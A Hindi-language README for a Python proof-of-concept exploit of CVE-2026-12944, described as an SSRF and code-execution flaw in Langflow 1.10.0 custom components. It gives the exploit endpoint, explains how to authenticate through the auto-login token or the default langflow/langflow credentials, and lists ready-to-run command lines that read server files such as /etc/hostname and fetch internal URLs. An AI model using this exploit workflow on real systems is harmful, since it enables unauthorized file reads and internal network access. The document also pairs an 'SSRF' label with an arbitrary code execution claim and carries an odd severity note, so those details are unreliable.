
Python PoC जो CVE-2026-12944 का उपयोग करता है, जो Langflow 1.10.0 में custom components में urllib के माध्यम से एक SSRF है, जिसमें authenticated read और fetch क्षमताएँ हैं।
Langflow OSS (≤ 1.10.0) — कस्टम कंपोनेंट्स में urllib.request / socket के माध्यम से मनमाना कोड निष्पादन की अनुमति देने वाली भेद्यता।
कंपोनेंट स्कैनर की डिनाइलिस्ट इन मानक लाइब्रेरी मॉड्यूल्स को मिस कर गई। 1.10.1 (IBM) में ठीक किया गया।
गंभीरता: PR:L (सार्वजनिक रूप से पुनरुत्पादनीय / निम्न गंभीरता)
एक्सप्लॉइट एंडपॉइंट: POST /api/v1/custom_component
इसके लिए सत्र कुकी या बियरर टोकन आवश्यक है।
--test — किसी प्रमाणीकरण की आवश्यकता नहीं। केवल एक सार्वजनिक GET /api/v1/version करता है।--read / --fetch — पहले प्रमाणित करें:
GET /api/v1/auto_login। यदि JSON प्रतिक्रिया में access_token है, तो Authorization: Bearer … भेजें (उपयोगकर्ता नाम/पासवर्ड की आवश्यकता नहीं)।application/x-www-form-urlencoded प्रारूप में --uname / --password का उपयोग करके POST /api/v1/login करें।POST /api/v1/custom_component पर भेजें।--uname / --password का उपयोग केवल तब किया जाता है जब ऑटो-लॉगिन अक्षम हो। डिफ़ॉल्ट स्टॉक इंस्टॉलेशन पर इन्हें अनदेखा किया जाता है।
केवल अधिकृत परीक्षण के लिए। इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की स्पष्ट अनुमति आपके पास नहीं है।
आवश्यकताएँ: Python 3 (केवल मानक लाइब्रेरी)।
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
रिपोर्ट और PoC: ShadowForge Cyber